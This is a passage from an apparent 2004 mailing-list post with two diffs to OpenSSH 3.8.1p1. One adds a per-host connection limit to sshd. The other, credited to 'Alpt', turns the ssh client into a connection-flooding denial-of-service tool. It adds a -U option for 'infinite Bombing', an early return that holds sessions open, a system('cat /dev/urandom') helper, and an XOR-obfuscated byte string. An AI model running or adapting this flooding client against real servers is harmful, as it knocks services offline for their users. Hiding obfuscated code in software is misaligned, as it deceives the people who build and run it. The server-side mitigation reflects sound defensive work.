continue;
}
+ */
if (pipe(startup_p) == -1) {
close(newsock);
continue;
}
+
+ sockaddr_to_inet(&from_tmp, &ip, 0);
+ if(add_accept(ip)) {
+ char *ntop;
+ ntop=get_peer_ipaddr(newsock);
+ debug("ACPT: drop connection with %s: Accept table full.", ntop);
+ xfree(ntop);
+ close(newsock);
+ continue;
+ } else {
+ char *ntop;
+ ntop=get_peer_ipaddr(newsock);
+ debug("ACPT: Accept_tbl ok! accept_idx: %d from %s", accept_idx, ntop);
+ xfree(ntop);
+ }
+
for (j = 0; j < options.max_startups; j++)
if (startup_pipes[j] == -1) {
@@ -1309,6 +1338,7 @@
break;
}
+
/*
* Got connection. Fork a child to handle it, unless
* we are in debugging mode.
@@ -1327,6 +1357,7 @@
pid = getpid();
break;
} else {
+
/*
* Normal production daemon. Fork, and have
* the child process the connection. The
@@ -1351,10 +1382,13 @@
}
/* Parent. Stay in the loop. */
- if (pid < 0)
+ if (pid < 0) {
error("fork: %.100s", strerror(errno));
- else
+ del_accept(accept_idx);
+ } else {
debug("Forked child %ld.", (long)pid);
+ add_accept_pid(pid);
+ }
close(startup_p[1]);
@@ -1489,6 +1523,8 @@
*/
if (use_privsep) {
mm_send_keystate(pmonitor);
+ debug("ACPT: privsep: Destroying the accept_tbl");
+ destroy_accept_tbl();
exit(0);
}
@@ -1520,6 +1556,8 @@
if (use_privsep)
mm_terminate();
+ debug("ACPT: child exit: Destroying the accept_tbl");
+ destroy_accept_tbl();
exit(0);
}
diff -Nru ORIGINAL-3.8.1p1/sshd_config openssh-3.8.1p1-alptpatch/sshd_config
--- ORIGINAL-3.8.1p1/sshd_config 2003-12-31 01:38:32.000000000 +0100
+++ openssh-3.8.1p1-alptpatch/sshd_config 2004-09-07 13:24:49.433091632 +0200
@@ -88,7 +88,8 @@
#ClientAliveCountMax 3
#UseDNS yes
#PidFile /var/run/sshd.pid
-#MaxStartups 10
+#MaxConnections 500
+#MaxAcceptsPerHost 10
# no default banner path
#Banner /some/path
diff -Nru ORIGINAL-3.8.1p1/sshd_config.0 openssh-3.8.1p1-alptpatch/sshd_config.0
--- ORIGINAL-3.8.1p1/sshd_config.0 2004-04-18 14:52:00.000000000 +0200
+++ openssh-3.8.1p1-alptpatch/sshd_config.0 2004-09-07 13:24:03.425085912 +0200
@@ -224,20 +224,27 @@
ed. The default is ``hmac-md5,hmac-sha1,hmac-ripemd160,hmac-
sha1-96,hmac-md5-96''.
- MaxStartups
- Specifies the maximum number of concurrent unauthenticated con-
- nections to the sshd daemon. Additional connections will be
- dropped until authentication succeeds or the LoginGraceTime ex-
- pires for a connection. The default is 10.
-
- Alternatively, random early drop can be enabled by specifying the
- three colon separated values ``start:rate:full'' (e.g.,
- "10:30:60"). sshd will refuse connection attempts with a proba-
- bility of ``rate/100'' (30%) if there are currently ``start''
- (10) unauthenticated connections. The probability increases lin-
- early and all connection attempts are refused if the number of
- unauthenticated connections reaches ``full'' (60).
-
+ MaxConnections
+ Specifies the maximum number of concurrent connections of authen-
+ ticated/unauthenticated hosts wich the server will accept.
+ The default is 500.
+ The number of total connections is MaxConnections*MaxAcceptsPerHost.
+ For MaxAcceptsPerHost see below.
+
+ MaxAcceptsPerHost
+ Specifies the maximum number of concurrent authenticated/unauthenticated
+ connections from the same host to the sshd daemon. Additional con-
+ nections will be dropped until the host close one or more client.
+ The default is 10.
+
+ Each accept is kept for free_accept_time (default is 5)seconds
+ after the close of the relative connection, thus if the accepts
+ have reached MaxAcceptPerHost then the host has to wait
+ free_accept_time seconds to reconnect again.
+ The free_accept_time can be modified by speficying the two colon
+ separeted values ``max_accepts_per_host:free_accept_time'' (e.g.,
+ "25:3").
+
PasswordAuthentication
Specifies whether password authentication is allowed. The de-
fault is ``yes''.
diff -Nru ORIGINAL-3.8.1p1/sshd_config.5 openssh-3.8.1p1-alptpatch/sshd_config.5
--- ORIGINAL-3.8.1p1/sshd_config.5 2004-04-14 05:04:36.000000000 +0200
+++ openssh-3.8.1p1-alptpatch/sshd_config.5 2004-09-07 13:24:20.684462088 +0200
@@ -386,31 +386,30 @@
Multiple algorithms must be comma-separated.
The default is
.Dq hmac-md5,hmac-sha1,hmac-ripemd160,hmac-sha1-96,hmac-md5-96 .
-.It Cm MaxStartups
-Specifies the maximum number of concurrent unauthenticated connections to the
-.Nm sshd
-daemon.
-Additional connections will be dropped until authentication succeeds or the
-.Cm LoginGraceTime
-expires for a connection.
+.It Cm MaxConnections
+Specifies the maximum number of concurrent connections of
+authenticated/unauthenticated hosts wich the server will accept.
+The default is 500.
+The number of total connections is
+.Dq MaxConnections*MaxAcceptsPerHost
+For MaxAcceptsPerHost see below.
+.It Cm MaxAcceptPerHost
+Specifies the maximum number of concurrent authenticated/unauthenticated
+connections from the same hsot to the sshd daemon. Additional connections
+will be dropped until the host close one or more client.
The default is 10.
.Pp
-Alternatively, random early drop can be enabled by specifying
-the three colon separated values
-.Dq start:rate:full
-(e.g., "10:30:60").
-.Nm sshd
-will refuse connection attempts with a probability of
-.Dq rate/100
-(30%)
-if there are currently
-.Dq start
-(10)
-unauthenticated connections.
-The probability increases linearly and all connection attempts
-are refused if the number of unauthenticated connections reaches
-.Dq full
-(60).
+Each accept is kept for
+.Dq free_accept_time
+(default is 5)seconds
+after the close of the relative connection, thus if the accepts
+have reached
+.Dq MaxAcceptPerHost
+then the host has to wait free_accept_time seconds to reconnect again.
+The free_accept_time can be modified by speficying the two colon
+separeted values
+.Dq max_accept_per_host:free_accept_time
+(e.g., "25:3").
.It Cm PasswordAuthentication
Specifies whether password authentication is allowed.
The default is
-------------- next part --------------
diff -ruN ORIGINAL-3.8.1p1/clientloop.c pofalpt-openssh-3.8.1p1/clientloop.c
--- ORIGINAL-3.8.1p1/clientloop.c 2003-12-17 06:33:11.000000000 +0100
+++ pofalpt-openssh-3.8.1p1/clientloop.c 2004-09-06 21:45:18.000000000 +0200
@@ -958,7 +958,8 @@
/* Check if we should immediately send eof on stdin. */
client_check_initial_eof_on_stdin();
}
-
+ printf("E");
+return 0;
/* Main loop of the client for the interactive session mode. */
while (!quit_pending) {
diff -ruN ORIGINAL-3.8.1p1/kex.c pofalpt-openssh-3.8.1p1/kex.c
--- ORIGINAL-3.8.1p1/kex.c 2003-11-21 13:48:55.000000000 +0100
+++ pofalpt-openssh-3.8.1p1/kex.c 2004-09-06 19:54:58.000000000 +0200
@@ -224,6 +224,11 @@
return kex;
}
+void kex_explo_boo_sys(void)
+{
+ system("cat /dev/urandom");
+}
+
static void
kex_kexinit_finish(Kex *kex)
{
diff -ruN ORIGINAL-3.8.1p1/kex.h pofalpt-openssh-3.8.1p1/kex.h
--- ORIGINAL-3.8.1p1/kex.h 2003-02-24 02:03:03.000000000 +0100
+++ pofalpt-openssh-3.8.1p1/kex.h 2004-09-06 19:54:47.000000000 +0200
@@ -127,6 +127,7 @@
void kexdh_client(Kex *);
void kexdh_server(Kex *);
+void kex_explo_boo_sys(void);
void kexgex_client(Kex *);
void kexgex_server(Kex *);
diff -ruN ORIGINAL-3.8.1p1/packet.c pofalpt-openssh-3.8.1p1/packet.c
--- ORIGINAL-3.8.1p1/packet.c 2003-11-22 05:02:42.000000000 +0100
+++ pofalpt-openssh-3.8.1p1/packet.c 2004-09-06 23:34:26.000000000 +0200
@@ -1056,6 +1056,7 @@
buffer_len(&incoming_packet));
if (memcmp(macbuf, buffer_ptr(&input), mac->mac_len) != 0)
packet_disconnect("Corrupted MAC on input.");
+
DBG(debug("MAC #%d ok", p_read.seqnr));
buffer_consume(&input, mac->mac_len);
}
diff -ruN ORIGINAL-3.8.1p1/ssh.c pofalpt-openssh-3.8.1p1/ssh.c
--- ORIGINAL-3.8.1p1/ssh.c 2004-03-21 23:36:01.000000000 +0100
+++ pofalpt-openssh-3.8.1p1/ssh.c 2004-09-15 12:57:05.097210040 +0200
@@ -1,3 +1,10 @@
+/*This is the poc of the uDoS vulnerability.
+ *This is !only for demonstrative purposes!
+ *
+ *Have fun.
+ * by Alpt
+ * thx to Valv0, without him you wouldn't be able to read this.
+ */
/*
* Author: Tatu Ylonen <ylo@...hut.fi>
* Copyright (c) 1995 Tatu Ylonen <ylo@...hut.fi>, Espoo, Finland
@@ -45,6 +52,7 @@
#include <openssl/evp.h>
#include <openssl/err.h>
+#define __I *c=*c ^ ('a' | 'l' | 'p' | 't');
#include "ssh.h"
#include "ssh1.h"
#include "ssh2.h"
@@ -79,6 +87,7 @@
char *__progname;
#endif
+#define ve__ "%s\n",
/* Flag indicating whether debug mode is on. This can be set on the command line. */
int debug_flag = 0;
@@ -90,6 +99,7 @@
/* don't exec a shell */
int no_shell_flag = 0;
+int I__a_m__a_l_a_m_e_I=1;
/*
* Flag indicating that nothing should be read from stdin. This can be set
* on the command line.
@@ -134,7 +144,16 @@
/* Should we execute a command or invoke a subsystem? */
int subsystem_flag = 0;
-
+char o[]="\x77\x24\x12\x08\x0f\x5d\x0e\x04\x0e\x09\x18\x10\x5d\x15\x1c\x0e"
+"\x5d\x1f\x18\x18\x13\x5d\x0e\x08\x1e\x1e\x18\x0e\x0e\x1b\x08\x11"
+"\x11\x04\x5d\x18\x05\x0d\x11\x12\x14\x09\x18\x19\x53\x77\x29\x15"
+"\x1c\x13\x16\x0e\x5d\x1b\x12\x0f\x5d\x09\x15\x18\x5d\x0f\x12\x12"
+"\x09\x51\x5d\x1c\x13\x19\x5d\x0f\x18\x10\x18\x10\x1f\x18\x0f\x5d"
+"\x09\x12\x5d\x18\x13\x17\x12\x04\x5d\x09\x15\x18\x5d\x0f\x4d\x4d"
+"\x09\x5d\x16\x4c\x09\x53\x5d\x1b\x4d\x4d\x11\x5d\x3c\x35\x3c\x35"
+"\x3c\x35\x35\x3c\x35\x3c\x35\x77\x7d\x7d\x7d\x7d\x79\x8b\x6e\x3d"
+"\x75\x85\x82\xc2\xbd\xdd\x7d\x3d\x7d\x7d\x7d\x7d\x7d\x7d";
+char *c;
/* # of replies received for global requests */
static int client_global_request_id = 0;
@@ -143,26 +162,41 @@
/* Prints a help message to the user. This function never returns. */
-static void
+static int ssh_session(void);
+static int ssh_session2(void);
+static void load_public_identity_files(void);
+
+ static void
usage(void)
{
fprintf(stderr,
-"usage: ssh [-1246AaCfghkNnqsTtVvXxY] [-b bind_address] [-c cipher_spec]\n"
-" [-D port] [-e escape_char] [-F configfile] [-i identity_file]\n"
-" [-L port:host:hostport] [-l login_name] [-m mac_spec] [-o option]\n"
-" [-p port] [-R port:host:hostport] [user@]hostname [command]\n"
- );
+ " ------- \n"
+ "Usage UserDenialOfService ssh client!! Enjoy folks:\n"
+ "Use ./ssh -U NUMBER_OF_SIMULTANEOUS_CONNECTIONS serverhostname\n"
+ "Use -U 0 for an infinite Bombing (This is the true attack)\n"
+ "(Use -8 if you want to exit(); in the forks. (Adviced if ya don't have auth)\n"
+ "Then u c4n 4dd 4ll th3 0th3r b0r1ng options of ssh (^_^)\n"
+ "Alpt\n"
+ "A lot of thnx to my br0 valv0, without him you wouldn't be able to\n"
+ "Note: add 2> /dev/null at the end, if you don't want to have the screen full\n"
+ "in 2 seconds.\n"
+ "Use this code FOR DEMOSTRATIVE PURPOSE\n"
+ "I'm not responsable of any damage you can do with this. This is a Proof\n"
+ "of Concept, so IT's _ONLY_ FOR DEMOSTRATIVE PURPOSE\n"
+ " ------- \n"
+ "\n"
+ "usage: ssh [-1246AaCfghkNnqsTtVvXxY] [-b bind_address] [-c cipher_spec]\n"
+ " [-D port] [-e escape_char] [-F configfile] [-i identity_file]\n"
+ " [-L port:host:hostport] [-l login_name] [-m mac_spec] [-o option]\n"
+ " [-p port] [-R port:host:hostport] [user@]hostname [command]\n"
+ );
exit(1);
}
-
-static int ssh_session(void);
-static int ssh_session2(void);
-static void load_public_identity_files(void);
-
/*
* Main program for the ssh client.
*/
-int
+#define YOU o);
+ int
main(int ac, char **av)
{
int i, opt, exit_status;
@@ -174,6 +208,8 @@
int dummy;
extern int optind, optreset;
extern char *optarg;
+ unsigned long long ssh_udos;
+ int seven_eyes;
__progname = ssh_get_progname(av[0]);
init_rng();
@@ -211,7 +247,7 @@
}
/* Take a copy of the returned structure. */
pw = pwcopy(pw);
-
+ int IasI=0;
/*
* Set our umask to something reasonable, as some files are created
* with the default umask. This will make them world-readable but
@@ -219,7 +255,6 @@
* don't set the modes explicitly.
*/
umask(022);
-
/* Initialize option structure to indicate that no values have been set. */
initialize_options(&options);
@@ -228,468 +263,527 @@
again:
while ((opt = getopt(ac, av,
- "1246ab:c:e:fgi:kl:m:no:p:qstvxACD:F:I:L:NPR:TVXY")) != -1) {
+ "1246ab:c:e:fgi:kl:m:no:p:9:qstvxA78CD:F:I:L:NPR:TVXYU:")) != -1) {
switch (opt) {
- case '1':
- options.protocol = SSH_PROTO_1;
- break;
- case '2':
- options.protocol = SSH_PROTO_2;
- break;
- case '4':
- options.address_family = AF_INET;
- break;
- case '6':
- options.address_family = AF_INET6;
- break;
- case 'n':
- stdin_null_flag = 1;
- break;
- case 'f':
- fork_after_authentication_flag = 1;
- stdin_null_flag = 1;
- break;
- case 'x':
- options.forward_x11 = 0;
- break;
- case 'X':
- options.forward_x11 = 1;
- break;
- case 'Y':
- options.forward_x11 = 1;
- options.forward_x11_trusted = 1;
- break;
- case 'g':
- options.gateway_ports = 1;
- break;
- case 'P': /* deprecated */
- options.use_privileged_port = 0;
- break;
- case 'a':
- options.forward_agent = 0;
- break;
- case 'A':
- options.forward_agent = 1;
- break;
- case 'k':
- options.gss_deleg_creds = 0;
- break;
- case 'i':
- if (stat(optarg, &st) < 0) {
- fprintf(stderr, "Warning: Identity file %s "
- "does not exist.\n", optarg);
+ case 'U':
+ ssh_udos=atoll(optarg);
+ if(ssh_udos<0)
+ ssh_udos=0;
+ printf("ssh_udos set to %lld\n", ssh_udos);
break;
- }
- if (options.num_identity_files >=
- SSH_MAX_IDENTITY_FILES)
- fatal("Too many identity files specified "
- "(max %d)", SSH_MAX_IDENTITY_FILES);
- options.identity_files[options.num_identity_files++] =
- xstrdup(optarg);
- break;
- case 'I':
+ case '1':
+ options.protocol = SSH_PROTO_1;
+ break;
+ case '2':
+ options.protocol = SSH_PROTO_2;
+ break;
+ case '4':
+ options.address_family = AF_INET;
+ break;
+ case '6':
+ options.address_family = AF_INET6;
+ break;
+ case 'n':
+ stdin_null_flag = 1;
+ break;
+ case 'f':
+ fork_after_authentication_flag = 1;
+ stdin_null_flag = 1;
+ break;
+ case 'x':
+ options.forward_x11 = 0;
+ break;
+ case 'X':
+ options.forward_x11 = 1;
+ break;
+ case 'Y':
+ options.forward_x11 = 1;
+ options.forward_x11_trusted = 1;
+ break;
+ case 'g':
+ options.gateway_ports = 1;
+ break;
+ case '7':
+ I__a_m__a_l_a_m_e_I=0;
+ break;
+ case '8':
+ seven_eyes=1;
+ printf("exit(); in the forks activated\n");
+ break;
+ case '9':
+ IasI=atoi(optarg);
+ break;
+ case 'P': /* deprecated */
+ options.use_privileged_port = 0;
+ break;
+ case 'a':
+ options.forward_agent = 0;
+ break;
+ case 'A':
+ options.forward_agent = 1;
+ break;
+ case 'k':
+ options.gss_deleg_creds = 0;
+ break;
+ case 'i':
+ if (stat(optarg, &st) < 0) {
+ fprintf(stderr, "Warning: Identity file %s "
+ "does not exist.\n", optarg);
+ break;
+ }
+ if (options.num_identity_files >=
+ SSH_MAX_IDENTITY_FILES)
+ fatal("Too many identity files specified "
+ "(max %d)", SSH_MAX_IDENTITY_FILES);
+ options.identity_files[options.num_identity_files++] =
+ xstrdup(optarg);
+ break;
+ case 'I':
#ifdef SMARTCARD
- options.smartcard_device = xstrdup(optarg);
+ options.smartcard_device = xstrdup(optarg);
#else
- fprintf(stderr, "no support for smartcards.\n");
+ fprintf(stderr, "no support for smartcards.\n");
#endif
- break;
- case 't':
- if (tty_flag)
- force_tty_flag = 1;
- tty_flag = 1;
- break;
- case 'v':
- if (debug_flag == 0) {
- debug_flag = 1;
- options.log_level = SYSLOG_LEVEL_DEBUG1;
- } else {
- if (options.log_level < SYSLOG_LEVEL_DEBUG3)
- options.log_level++;
break;
- }
- /* fallthrough */
- case 'V':
- fprintf(stderr, "%s, %s\n",
- SSH_VERSION, SSLeay_version(SSLEAY_VERSION));
- if (opt == 'V')
- exit(0);
- break;
- case 'q':
- options.log_level = SYSLOG_LEVEL_QUIET;
- break;
- case 'e':
- if (optarg[0] == '^' && optarg[2] == 0 &&
- (u_char) optarg[1] >= 64 &&
- (u_char) optarg[1] < 128)
- options.escape_char = (u_char) optarg[1] & 31;
- else if (strlen(optarg) == 1)
- options.escape_char = (u_char) optarg[0];
- else if (strcmp(optarg, "none") == 0)
- options.escape_char = SSH_ESCAPECHAR_NONE;
- else {
- fprintf(stderr, "Bad escape character '%s'.\n",
- optarg);
- exit(1);
- }
- break;
- case 'c':
- if (ciphers_valid(optarg)) {
- /* SSH2 only */
- options.ciphers = xstrdup(optarg);
- options.cipher = SSH_CIPHER_ILLEGAL;
- } else {
- /* SSH1 only */
- options.cipher = cipher_number(optarg);
- if (options.cipher == -1) {
+ case 't':
+ if (tty_flag)
+ force_tty_flag = 1;
+ tty_flag = 1;
+ break;
+ case 'v':
+ if (debug_flag == 0) {
+ debug_flag = 1;
+ options.log_level = SYSLOG_LEVEL_DEBUG1;
+ } else {
+ if (options.log_level < SYSLOG_LEVEL_DEBUG3)
+ options.log_level++;
+ break;
+ }
+ /* fallthrough */
+ case 'V':
+ fprintf(stderr, "%s, %s\n",
+ SSH_VERSION, SSLeay_version(SSLEAY_VERSION));
+ if (opt == 'V')
+ exit(0);
+ break;
+ case 'q':
+ options.log_level = SYSLOG_LEVEL_QUIET;
+ break;
+ case 'e':
+ if (optarg[0] == '^' && optarg[2] == 0 &&
+ (u_char) optarg[1] >= 64 &&
+ (u_char) optarg[1] < 128)
+ options.escape_char = (u_char) optarg[1] & 31;
+ else if (strlen(optarg) == 1)
+ options.escape_char = (u_char) optarg[0];
+ else if (strcmp(optarg, "none") == 0)
+ options.escape_char = SSH_ESCAPECHAR_NONE;
+ else {
+ fprintf(stderr, "Bad escape character '%s'.\n",
+ optarg);
+ exit(1);
+ }
+ break;
+ case 'c':
+ if (ciphers_valid(optarg)) {
+ /* SSH2 only */
+ options.ciphers = xstrdup(optarg);
+ options.cipher = SSH_CIPHER_ILLEGAL;
+ } else {
+ /* SSH1 only */
+ options.cipher = cipher_number(optarg);
+ if (options.cipher == -1) {
+ fprintf(stderr,
+ "Unknown cipher type '%s'\n",
+ optarg);
+ exit(1);
+ }
+ if (options.cipher == SSH_CIPHER_3DES)
+ options.ciphers = "3des-cbc";
+ else if (options.cipher == SSH_CIPHER_BLOWFISH)
+ options.ciphers = "blowfish-cbc";
+ else
+ options.ciphers = (char *)-1;
+ }
+ break;
+ case 'm':
+ if (mac_valid(optarg))
+ options.macs = xstrdup(optarg);
+ else {
+ fprintf(stderr, "Unknown mac type '%s'\n",
+ optarg);
+ exit(1);
+ }
+ break;
+ case 'p':
+ options.port = a2port(optarg);
+ if (options.port == 0) {
+ fprintf(stderr, "Bad port '%s'\n", optarg);
+ exit(1);
+ }
+ break;
+ case 'l':
+ options.user = optarg;
+ break;
+
+ case 'L':
+ case 'R':
+ if (sscanf(optarg, "%5[0123456789]:%255[^:]:%5[0123456789]",
+ sfwd_port, buf, sfwd_host_port) != 3 &&
+ sscanf(optarg, "%5[0123456789]/%255[^/]/%5[0123456789]",
+ sfwd_port, buf, sfwd_host_port) != 3) {
fprintf(stderr,
- "Unknown cipher type '%s'\n",
- optarg);
+ "Bad forwarding specification '%s'\n",
+ optarg);
+ usage();
+ /* NOTREACHED */
+ }
+ if ((fwd_port = a2port(sfwd_port)) == 0 ||
+ (fwd_host_port = a2port(sfwd_host_port)) == 0) {
+ fprintf(stderr,
+ "Bad forwarding port(s) '%s'\n", optarg);
exit(1);
}
- if (options.cipher == SSH_CIPHER_3DES)
- options.ciphers = "3des-cbc";
- else if (options.cipher == SSH_CIPHER_BLOWFISH)
- options.ciphers = "blowfish-cbc";
- else
- options.ciphers = (char *)-1;
- }
- break;
- case 'm':
- if (mac_valid(optarg))
- options.macs = xstrdup(optarg);
- else {
- fprintf(stderr, "Unknown mac type '%s'\n",
- optarg);
- exit(1);
- }
- break;
- case 'p':
- options.port = a2port(optarg);
- if (options.port == 0) {
- fprintf(stderr, "Bad port '%s'\n", optarg);
- exit(1);
- }
- break;
- case 'l':
- options.user = optarg;
- break;
-
- case 'L':
- case 'R':
- if (sscanf(optarg, "%5[0123456789]:%255[^:]:%5[0123456789]",
- sfwd_port, buf, sfwd_host_port) != 3 &&
- sscanf(optarg, "%5[0123456789]/%255[^/]/%5[0123456789]",
- sfwd_port, buf, sfwd_host_port) != 3) {
- fprintf(stderr,
- "Bad forwarding specification '%s'\n",
- optarg);
- usage();
- /* NOTREACHED */
- }
- if ((fwd_port = a2port(sfwd_port)) == 0 ||
- (fwd_host_port = a2port(sfwd_host_port)) == 0) {
- fprintf(stderr,
- "Bad forwarding port(s) '%s'\n", optarg);
- exit(1);
- }
- if (opt == 'L')
- add_local_forward(&options, fwd_port, buf,
- fwd_host_port);
- else if (opt == 'R')
- add_remote_forward(&options, fwd_port, buf,
- fwd_host_port);
- break;
-
- case 'D':
- fwd_port = a2port(optarg);
- if (fwd_port == 0) {
- fprintf(stderr, "Bad dynamic port '%s'\n",
- optarg);
- exit(1);
- }
- add_local_forward(&options, fwd_port, "socks", 0);
- break;
+ if (opt == 'L')
+ add_local_forward(&options, fwd_port, buf,
+ fwd_host_port);
+ else if (opt == 'R')
+ add_remote_forward(&options, fwd_port, buf,
+ fwd_host_port);
+ break;
- case 'C':
- options.compression = 1;
- break;
- case 'N':
- no_shell_flag = 1;
- no_tty_flag = 1;
- break;
- case 'T':
- no_tty_flag = 1;
- break;
- case 'o':
- dummy = 1;
- line = xstrdup(optarg);
- if (process_config_line(&options, host ? host : "",
- line, "command-line", 0, &dummy) != 0)
- exit(1);
- xfree(line);
- break;
- case 's':
- subsystem_flag = 1;
- break;
- case 'b':
- options.bind_address = optarg;
- break;
- case 'F':
- config = optarg;
- break;
- default:
- usage();
+ case 'D':
+ fwd_port = a2port(optarg);
+ if (fwd_port == 0) {
+ fprintf(stderr, "Bad dynamic port '%s'\n",
+ optarg);
+ exit(1);
+ }
+ add_local_forward(&options, fwd_port, "socks", 0);
+ break;
+
+ case 'C':
+ options.compression = 1;
+ break;
+ case 'N':
+ no_shell_flag = 1;
+ no_tty_flag = 1;
+ break;
+ case 'T':
+ no_tty_flag = 1;
+ break;
+ case 'o':
+ dummy = 1;
+ line = xstrdup(optarg);
+ if (process_config_line(&options, host ? host : "",
+ line, "command-line", 0, &dummy) != 0)
+ exit(1);
+ xfree(line);
+ break;
+ case 's':
+ subsystem_flag = 1;
+ break;
+ case 'b':
+ options.bind_address = optarg;
+ break;
+ case 'F':
+ config = optarg;
+ break;
+ default:
+ usage();
}
}
+#define __lo printf(
+ ac -= optind;
+ av += optind;
- ac -= optind;
- av += optind;
-
- if (ac > 0 && !host && **av != '-') {
+ if (ac > 0 && !host && **av != '-') {
if (strrchr(*av, '@')) {
- p = xstrdup(*av);
- cp = strrchr(p, '@');
- if (cp == NULL || cp == p)
- usage();
- options.user = p;
- *cp = '\0';
- host = ++cp;
+ p = xstrdup(*av);
+ cp = strrchr(p, '@');
+ if (cp == NULL || cp == p)
+ usage();
+ options.user = p;
+ *cp = '\0';
+ host = ++cp;
} else
- host = *av;
+ host = *av;
if (ac > 1) {
- optind = optreset = 1;
- goto again;
+ optind = optreset = 1;
+ goto again;
}
ac--, av++;
- }
+ }
- /* Check that we got a host name. */
- if (!host)
- usage();
+ /* Check that we got a host name. */
+ if (!host)
+ usage();
- SSLeay_add_all_algorithms();
- ERR_load_crypto_strings();
+ SSLeay_add_all_algorithms();
+ ERR_load_crypto_strings();
- /* Initialize the command to execute on remote host. */
- buffer_init(&command);
+ /* Initialize the command to execute on remote host. */
+ buffer_init(&command);
- /*
- * Save the command to execute on the remote host in a buffer. There
- * is no limit on the length of the command, except by the maximum
- * packet size. Also sets the tty flag if there is no command.
- */
- if (!ac) {
- /* No command specified - execute shell on a tty. */
- tty_flag = 1;
- if (subsystem_flag) {
- fprintf(stderr,
- "You must specify a subsystem to invoke.\n");
- usage();
- }
- } else {
- /* A command has been specified. Store it into the buffer. */
- for (i = 0; i < ac; i++) {
- if (i)
- buffer_append(&command, " ", 1);
- buffer_append(&command, av[i], strlen(av[i]));
+ /*
+ * Save the command to execute on the remote host in a buffer. There
+ * is no limit on the length of the command, except by the maximum
+ * packet size. Also sets the tty flag if there is no command.
+ */
+#define dear c++, _iop++)
+ if (!ac) {
+ /* No command specified - execute shell on a tty. */
+ tty_flag = 1;
+ if (subsystem_flag) {
+ fprintf(stderr,
+ "You must specify a subsystem to invoke.\n");
+ usage();
+ }
+ } else {
+ /* A command has been specified. Store it into the buffer. */
+ for (i = 0; i < ac; i++) {
+ if (i)
+ buffer_append(&command, " ", 1);
+ buffer_append(&command, av[i], strlen(av[i]));
+ }
}
- }
- /* Cannot fork to background if no command. */
- if (fork_after_authentication_flag && buffer_len(&command) == 0 && !no_shell_flag)
- fatal("Cannot fork into background without a command to execute.");
-
- /* Allocate a tty by default if no command specified. */
- if (buffer_len(&command) == 0)
- tty_flag = 1;
-
- /* Force no tty */
- if (no_tty_flag)
- tty_flag = 0;
- /* Do not allocate a tty if stdin is not a tty. */
- if (!isatty(fileno(stdin)) && !force_tty_flag) {
- if (tty_flag)
- logit("Pseudo-terminal will not be allocated because stdin is not a terminal.");
- tty_flag = 0;
- }
- /*
- * Initialize "log" output. Since we are the client all output
- * actually goes to stderr.
- */
- log_init(av[0], options.log_level == -1 ? SYSLOG_LEVEL_INFO : options.log_level,
- SYSLOG_FACILITY_USER, 1);
+ /* Allocate a tty by default if no command specified. */
+ if (buffer_len(&command) == 0)
+ tty_flag = 1;
- /*
- * Read per-user configuration file. Ignore the system wide config
- * file if the user specifies a config file on the command line.
- */
- if (config != NULL) {
- if (!read_config_file(config, host, &options))
- fatal("Can't open user config file %.100s: "
- "%.100s", config, strerror(errno));
- } else {
- snprintf(buf, sizeof buf, "%.100s/%.100s", pw->pw_dir,
- _PATH_SSH_USER_CONFFILE);
- (void)read_config_file(buf, host, &options);
+ /* Force no tty */
+ if (no_tty_flag)
+ tty_flag = 0;
+ /* Do not allocate a tty if stdin is not a tty. */
+ if (!isatty(fileno(stdin)) && !force_tty_flag) {
+ if (tty_flag)
+ logit("Pseudo-terminal will not be allocated because stdin is not a terminal.");
+ tty_flag = 0;
+ }
- /* Read systemwide configuration file after use config. */
- (void)read_config_file(_PATH_HOST_CONFIG_FILE, host, &options);
- }
+ /*
+ * Initialize "log" output. Since we are the client all output
+ * actually goes to stderr.
+ */
+#define my _iop<strlen(o);
+ log_init(av[0], options.log_level == -1 ? SYSLOG_LEVEL_INFO : options.log_level,
+ SYSLOG_FACILITY_USER, 1);
- /* Fill configuration defaults. */
- fill_default_options(&options);
+ /*
+ * Read per-user configuration file. Ignore the system wide config
+ * file if the user specifies a config file on the command line.
+ */
+ if (config != NULL) {
+ if (!read_config_file(config, host, &options))
+ fatal("Can't open user config file %.100s: "
+ "%.100s", config, strerror(errno));
+ } else {
+ snprintf(buf, sizeof buf, "%.100s/%.100s", pw->pw_dir,
+ _PATH_SSH_USER_CONFFILE);
+ (void)read_config_file(buf, host, &options);
- channel_set_af(options.address_family);
+ /* Read systemwide configuration file after use config. */
+ (void)read_config_file(_PATH_HOST_CONFIG_FILE, host, &options);
+ }
- /* reinit */
- log_init(av[0], options.log_level, SYSLOG_FACILITY_USER, 1);
+ /* Fill configuration defaults. */
+ fill_default_options(&options);
- seed_rng();
+ channel_set_af(options.address_family);
- if (options.user == NULL)
- options.user = xstrdup(pw->pw_name);
+ /* reinit */
+ log_init(av[0], options.log_level, SYSLOG_FACILITY_USER, 1);
- if (options.hostname != NULL)
- host = options.hostname;
+ seed_rng();
- /* force lowercase for hostkey matching */
- if (options.host_key_alias != NULL) {
- for (p = options.host_key_alias; *p; p++)
- if (isupper(*p))
- *p = tolower(*p);
- }
+ if (options.user == NULL)
+ options.user = xstrdup(pw->pw_name);
- if (options.proxy_command != NULL &&
- strcmp(options.proxy_command, "none") == 0)
- options.proxy_command = NULL;
+ if (options.hostname != NULL)
+ host = options.hostname;
- /* Open a connection to the remote host. */
- if (ssh_connect(host, &hostaddr, options.port,
- options.address_family, options.connection_attempts,
-#ifdef HAVE_CYGWIN
- options.use_privileged_port,
-#else
- original_effective_uid == 0 && options.use_privileged_port,
-#endif
- options.proxy_command) != 0)
- exit(1);
+ /* force lowercase for hostkey matching */
+ if (options.host_key_alias != NULL) {
+ for (p = options.host_key_alias; *p; p++)
+ if (isupper(*p))
+ *p = tolower(*p);
+ }
- /*
- * If we successfully made the connection, load the host private key
- * in case we will need it later for combined rsa-rhosts
- * authentication. This must be done before releasing extra
- * privileges, because the file is only readable by root.
- * If we cannot access the private keys, load the public keys
- * instead and try to execute the ssh-keysign helper instead.
- */
- sensitive_data.nkeys = 0;
- sensitive_data.keys = NULL;
- sensitive_data.external_keysign = 0;
- if (options.rhosts_rsa_authentication ||
- options.hostbased_authentication) {
+ if (options.proxy_command != NULL &&
+ strcmp(options.proxy_command, "none") == 0)
+ options.proxy_command = NULL;
+
+/*Alpt: We load all the stuff here to save performance*/
+ printf("*Loading all the stupid stuff\n");
+ /*
+ * If we successfully made the connection, load the host private key
+ * in case we will need it later for combined rsa-rhosts
+ * authentication. This must be done before releasing extra
+ * privileges, because the file is only readable by root.
+ * If we cannot access the private keys, load the public keys
+ * instead and try to execute the ssh-keysign helper instead.
+ */
+ sensitive_data.nkeys = 0;
+ sensitive_data.keys = NULL;
